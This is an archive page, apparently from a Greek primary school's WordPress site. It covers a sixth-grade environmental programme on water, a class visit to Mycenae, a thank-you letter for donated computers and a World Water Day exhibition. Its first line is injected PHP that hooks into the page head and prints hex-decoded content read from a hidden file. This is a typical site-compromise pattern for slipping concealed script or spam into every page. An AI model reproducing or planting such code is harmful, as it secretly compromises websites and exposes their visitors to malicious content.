if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μάιος, 2013 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Μάιος 2013

Νερό, Πηγή Ζωής

ΣΧΟΛΙΚΟ  ΠΕΡΙΒΑΛΛΟΝΤΙΚΟ  ΚΑΙΝΟΤΟΜΟ  ΠΡΟΓΡΑΜΜΑ:  «ΝΕΡΟ, ΠΗΓΗ  ΖΩΗΣ»

ΔΗΜΟΤΙΚΟ  ΣΧΟΛΕΙΟ  ΛΕΩΝΙΔΙΟΥ

ΣΤ ΄ ΤΑΞΗ 

 ΜΑΘΗΤΕΣ:  30

ΕΚΠΑΙΔΕΥΤΙΚΟΙ :  ΡΟΥΣΑΛΗ  ΕΥΓΕΝΙΑ,  ΠΑΠΑΣΑΡΑΝΤΗΣ  ΚΩΝ/ΝΟΣ

ΣΧΟΛΙΚΗ ΧΡΟΝΙΑ:  2012 -2013

 

ΣΤΟΧΟΙ  ΠΡΟΓΡΑΜΜΑΤΟΣ :

1)      Να κατανοήσουν οι μαθητές τη σπουδαιότητα του νερού στην καθημερινή μας  ζωή.

2)      Να εκτιμήσουν τις ανθρώπινες δραστηριότητες που σχετίζονται με τα επιφανειακά και υπόγεια ύδατα , από το παρελθόν μέχρι σήμερα.

3)      Να γνωρίσουν τον τρόπο χρήσης του νερού στα παλαιότερα χρόνια.

4)      Να ευαισθητοποιηθούν στην ανάγκη προστασίας του από τη ρύπανση , την υπεράντληση και οποιονδήποτε άλλο παράγοντα που οδηγεί στη μείωση της ποσότητάς του.

5)      Να αντιληφθούν την ανάγκη περιορισμού της σπατάλης στην κατανάλωσή του.

6)      Να αντιληφθούν την άμεση ανάγκη διατήρησης και προστασίας των υγροτόπων και να επισκεφθούν  υγροτόπους.

7)      Να μελετούν χάρτες , να εντοπίζουν ποταμούς και λίμνες στην Ελλάδα αλλά και σε όλο τον κόσμο, συνειδητοποιώντας την αξία του νερού για τους ανθρώπους , για τη χλωρίδα και τη πανίδα κάθε τόπου.

8)      Να συνδέσουν την ύπαρξη του υγρού στοιχείου σε όλες σχεδόν τις πτυχές της ζωής μας, σε όλες μας τις δραστηριότητες.

9)      Να διακρίνουν τα στάδια του νερού , μέχρι αυτό να φτάσει στα σπίτια μας.( κύκλος νερού )

10)  Να εκτιμήσουν την αξία του ως εναλλακτική πηγή ενέργειας.

11)  Να προτείνουν λύσεις στα προβλήματα που σχετίζονται με το νερό.

 

ΣΤΑΔΙΑ  ΠΡΟΓΡΑΜΜΑΤΟΣ :

ΠΡΩΤΟ ΣΤΑΔΙΟ:

·         Συλλογικός προγραμματισμός ? καθορισμός του θέματος

·         Εξακτίνωση  του  θέματος  διαθεματικά  με γνώμονα τα μαθητικά ενδιαφέροντα και τις μαθητικές αναζητήσεις 

·         Ανάρτηση αυτής της διαθεματικής εξακτίνωσης στην τάξη, προκειμένου να ανατρέχουν οι μαθητές σε αυτήν, ανάλογα με το θέμα που προκύπτει κάθε φορά

ΔΕΥΤΕΡΟ  ΣΤΑΔΙΟ:

·         Χωρισμός ομάδων ? κατάθεση πρώτων ιδεών μέσα στα πλαίσια της ομάδας

·         Καταμερισμός εργασιών ? συγκέντρωση πληροφοριών, εντοπισμός χρήσιμων πηγών  (διαδίκτυο, παλιές εφημερίδες κ.ά.)

·         Προτάσεις  ομάδων για διάφορες δραστηριότητες εντός και εκτός σχολείου

ΤΡΙΤΟ  ΣΤΑΔΙΟ:

Υλοποίηση  δραστηριοτήτων εντός τάξης αλλά και εκτός.

nero.jpg

 

ΔΡΑΣΤΗΡΙΟΤΗΤΕΣ  ΠΡΟΓΡΑΜΜΑΤΟΣ :

1)      Φτιάχνουμε το αλφαβητάρι του νερού. Για κάθε γράμμα, βρίσκουμε λέξεις σχετικές με το νερό (κατασκευή αφίσας)

2)      Φανταζόμαστε ότι είμαστε επισκέπτες από άλλο πλανήτη και για πρώτη φορά βλέπουμε νερό. Προσπαθούμε να το περιγράψουμε στους φίλους μας, πίσω στην πατρίδα (παραγωγή Γραπτού Λόγου)

3)      Βρίσκουμε από το διαδίκτυο σε όσες περισσότερες γλώσσες μπορούμε , τη λέξη νερό. (χρήση διαδικτύου για πληροφορίες)

4)      Βρίσκουμε παροιμίες ? φράσεις που περιέχουν τη λέξη νερό.

5)      Βρίσκουμε τραγούδια για το νερό.

6)      Σχεδιάζουμε τη διαδρομή του νερού ως τη βρύση μας (κατασκευή σε μεγάλο χαρτόνι με φωτογραφίες και σχέδια)

7)      Επισκεπτόμαστε τον Υγρότοπο Μουστού και μαθαίνουμε πληροφορίες για τη χλωρίδα ? πανίδα, παρατηρούμε από κοντά τα διάφορα προβλήματα

8)      Επισκεπτόμαστε τη μία Δεξαμενή του τόπου μας

9)      Παρακολουθούμε βίντεο από υδροηλεκτρικά εργοστάσια, φράγματα, λίμνες του κόσμου, ποταμούς και καταρράκτες (πηγή: YouTube)

 10)Κρατάμε ατομικό ημερολόγιο κατανάλωσης νερού μιας εβδομάδας το χειμώνα και μιας εβδομάδας την άνοιξη

 11)  Μαθαίνουμε να διαβάζουμε έναν λογαριασμό νερού

 12)  Παρατηρούμε στην τάξη τα είδη του εμφιαλωμένου νερού, καταγράφουμε πηγές, συστατικά καθώς και διαφορές στις συσκευασίες

 13)Επισκεπτόμαστε το Υπαίθριο Μουσείο Υδροκίνησης στη Δημητσάνα Αρκαδίας

 14)Ρωτάμε έναν γεωργό για τις ανάγκες των φυτών του, τον τρόπο ποτίσματος, τη χρήση λιπασμάτων ή φυτοφαρμάκων κτλ

 15)  Αναζητούμε πληροφορίες από την ΕΥΔΑΠ  

 16)  Κατασκευάζουμε αφίσα για την Παγκόσμια Ημέρα Νερού στο προαύλιο του σχολείου μας

 

Επίσκεψη στις Μυκήνες

Ο αρχαιολογικός χώρος των Μυκηνών μέσα από τα μάτια των παιδιών της Γ τάξης?.
Στις 16-5-2013 οι μαθητές επισκέφθηκαν τον αρχαιολογικό χώρο των Μυκηνών συνοδευόμενοι από τις δασκάλες τους.
Οι Μυκήνες αποτέλεσαν τη μητρόπολη του μυκηναϊκού κόσμου, που έδωσε το όνομά της σε μια εποχή και σε έναν πολιτισμό που αναπτύχθηκε σε όλο τον ελλαδικό χώρο ανάμεσα στο 16-12 αιώνα π.Χ. και διαδόθηκε σε όλες τις τότε γνωστές θέσεις της λεκάνης της Μεσογείου.
Σκοπός της επίσκεψης η γνωριμία των μαθητών με το αρχαιολογικό χώρο, να συνειδητοποιήσουν τη σημασία της πολιτιστικής μας κληρονομιάς και να θαυμάσουν από κοντά τους αρχαιολογικούς θησαυρούς των Μυκηνών που διδάχτηκαν στο μάθημα της Ιστορίας.

 

 

 

Εντύπωση από την επίσκεψη της τάξης μου στον αρχαιολογικό χώρο των Μυκηνών μου έκανε ο τεράστιος θολωτός τάφος του Αγαμέμνονα, τα δύο πέτρινα ακέφαλα λιοντάρια της εισόδου, τα κυκλώπεια τείχη.

Εντυπωσιάστηκα από το μουσείο, που είδα από κοντά τις χρυσές προσωπίδες, τα αγγεία, τα αγαλματάκια, τα χρυσαφικά και τις χτένες που χρησιμοποιούσαν οι γυναίκες για να χτενίζουν τα μαλλιά τους.

Με εντυπωσίασε ο θολωτός τάφος του Ατρέα, γιατί πίστευα πως θα είχε μικρότερη πόρτα και ότι θα ήταν μικρότερος ο χώρος.

Εντυπωσιάστηκα πολύ από το θολωτό πέτρινο τάφο του Αγαμέμνονα, την πύλη των Λεόντων, το ανάκτορο, το μέγαρο, το μουσείο με τα χρυσά κτερίσματα και τις μεγάλες πολύτιμες πέτρες.

Από τον αρχαιολογικό χώρο των Μυκηνών μου έκανε εντύπωση ο τάφος του Αγαμέμνονα. Από το μουσείο μου έκαναν εντύπωση τα αγγεία των Μυκηνών και οι τοιχογραφίες. Επίσης μου άρεσαν τα τείχη της Ακρόπολης και η πύλη των Λεόντων.

Eπίσκεψη στο Κέντρο Περιβαλλοντικής Ενημέρωσης Άστρους

Σας ευχαριστούμε πολύ για την επίσκεψή σας και με χαρά θα σας υποδεχθούμε ξανά στα τρία Κέντρα Περιβαλλοντικής Ενημέρωσης του φορέα διαχείρισης ή στην προστατευόμενη περιοχή του όρους Πάρνωνα και υγροτόπου Μουστού. Σας υπενθυμίζουμε ότι η επίσκεψη ομάδων (π.χ. μαθητών, φοιτητών, εκδρομέων κ.λπ.) στα Κέντρα Περιβαλλοντικής Ενημέρωσης είναι χωρίς χρέωση και πραγματοποιείται εργάσιμες ημέρες αλλά και Σαββατοκύριακα και αργίες κατόπιν συνεννόησης.

Για οποιαδήποτε άλλη πληροφορία, παραμένουμε στη διάθεσή σας.

Με εκτίμηση,

Πανταζή Αικατερίνη
Ξεναγός Κέντρου Περιβαλλοντικής Ενημέρωσης Άστρους
Τμήμα Πληροφόρησης Εκπαίδευσης & Δημοσιότητας
Φορέας Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού

ΕΥΧΑΡΙΣΤΗΡΙΟ

Προς :
κ. Μαριάννα Βαρδινογιάννη Λεωνίδιο 20/05/2013

Καθώς περπατάμε σκυφτοί από το βάρος των υποχρεώσεων, σε ένα κόσμο που διαισθάνεται ότι χάνεται, ένα μικρό φως είναι αρκετό να μας ορθώσει και να τονίσει πως μπορούμε ακόμη να φτιάχνουμε γέφυρες, πως μπορούμε ακόμη να ελπίζουμε σε έναν κόσμο που δικαιούνται τα παιδιά μας να έχουν.
Αξιότιμη κ. Μαριάννα Βαρδινογιάννη , είστε πράγματι ένα φως που εμπνέει, γονείς , εκπαιδευτικούς ,αλλά κυρίως τους μικρούς μας μαθητές και εδώ στο όμορφο Λεωνίδιο και τις γύρω περιοχές. Ένα πρότυπο μεγαλοψυχίας και προσφοράς στον συνάνθρωπο και η φράση σας ότι όλοι έχουμε χρέος να αφήσουμε στο πέρασμά μας ένα κομμάτι ανθρωπιάς έχει γίνει στάση ζωής που όλοι θαυμάζουμε.
Οι μαθητές, ο Διευθυντής, το διδακτικό προσωπικό και οι Γονείς του 12/θέσιου Πιλοτικού Δημοτικού Σχολείου Λεωνιδίου (ΕΑΕΠ) σας ευχαριστούμε για άλλη μια φορά για την συμπαράστασή σας προς το Σχολείο μας με τη δωρεά των δέκα (10) Η/Υ που έρχεται να καλύψει πλήρως τις εκπαιδευτικές ανάγκες των μαθητών στη κοινωνία της πληροφορίας. Το ευχαριστήριο αυτό είναι το ελάχιστο που μπορούμε να κάνουμε απέναντι σε ανθρώπους που βλέπουν καθαρά με τα μάτια της προσφοράς και της αγάπης.

Με σεβασμό, εκ μέρους των Μαθητών, των Γονέων, του Συλλόγου Διδασκόντων του Δημοτικού Σχολείου Λεωνιδίου

Ο Διευθυντής

Τσαγκούρης Παναγιώτης

Παγκόσμια ημέρα νερού ? 22 Μαρτίου

Οι μαθητές της ΣΤ΄ τάξης του Δημοτικού μας Σχολείου, με αφορμή την Παγκόσμια Ημέρα Νερού και  στα πλαίσια του Περιβαλλοντικού Προγράμματος  «Νερό, πηγή ζωής», θέλησαν για ακόμη μια φορά να δραστηριοποιηθούν έντονα. Αφού συζήτησαν σε ομάδες και κατέγραψαν τα σημερινά προβλήματα του τόπου, αλλά όλου του κόσμου, πρότειναν διάφορες λύσεις. Όλα τα προηγούμενα, θέλησαν ανά ομάδες να τα αποτυπώσουν σε μεγάλες ζωγραφιές, ενώ έφτιαξαν το Αλφαβητάρι του Νερού και μια αφίσα με φράσεις (παροιμίες, παρομοιώσεις κ.ά) που  περιέχουν τη λέξη ΝΕΡΟ. Στο τέλος, αποφάσισαν να κάνουν μια «μικρή έκθεση» στο προαύλιο, προς ενημέρωση και ευαισθητοποίηση ?. μικρών και μεγάλων!